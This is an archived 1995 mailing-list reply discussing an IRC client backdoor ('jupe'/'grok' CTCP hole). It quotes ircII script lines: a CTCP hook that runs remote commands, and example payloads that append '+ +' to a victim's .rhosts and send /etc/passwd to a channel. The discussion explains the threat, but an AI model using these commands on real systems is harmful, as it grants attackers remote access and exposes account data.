Re: IRC Security Loophole

Silicon Avatar (zitz@infinity.ivdev.com)
Sat, 4 Feb 1995 00:43:21 -0600 (CST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: der Mouse: "Re: SEX (fwd)"
Previous message: Karl Strickland: "Re: SEX (fwd)"
In reply to: Kernel Panic: "Re: IRC Security Loophole"

On Fri, 3 Feb 1995, Kernel Panic wrote:

> On Fri, 3 Feb 1995, Silicon Avatar wrote:
> 
> > On Fri, 3 Feb 1995, Lorna Leong wrote:
> > If you are talking about the "jupe" or "grok" hole.  It was temporary, and
> > merely hacked version of the client floating around at "trusted" sites.
> > 
> > To my knowledge, these "hacks" have been removed and are no longer a threat
> > (unless someone is propogating these older clients.)
> > 
> > Simply put, you could "CTCP grok [command]" (CTCP being a method of
> > communication over IRC) someone, and have that command executed,
> > unknowingly, off the account.
> 
> No, IRC holes are a more serious threat than you give then credit for. 
> For example, if I were to add to a script (or better yet make someone 
> type) the following:
> 
> /on ^ctcp "% % JUPE" $3-
> 
> They would be just as much in my control as if they were on a hacked client.
> from this, you can do:
> 
> /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts
> 
> or
> 
> /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd
> 
> Theres more to IRC backdoors than making people say stupid stuff on a 
> channel. I hope this example clears that up a little.

I never said the hole was limited to saying something on the channel.  I
said that command could be executed off that account.  The *known* hole that
was cert-released was what I described.  What you describe is a lackage of
knowledge in general ircII-scripting causing people to use other, unknown
scripts.  Often times, these scripts have their own backholes ...  But this
is not a hole generated at a "guaranteed" site.

 /----------------------------------------------------------------------\
<> Stephan K. Zitz                  <>  My mind is my best friend...    <>
<> zitz@infinity.ivdev.com          <>   And my worst enemy... GABBPUY! <>
<>        Integrated Visions -- Watch out, is on its way....            <>
 \======================================================================/
 GCS/M d-- p c++++ l+++ u++ e+ m-(++) s !n h++ f(++)* !g w+++ t+++ r+ y+(*)

Next message: der Mouse: "Re: SEX (fwd)"
Previous message: Karl Strickland: "Re: SEX (fwd)"
In reply to: Kernel Panic: "Re: IRC Security Loophole"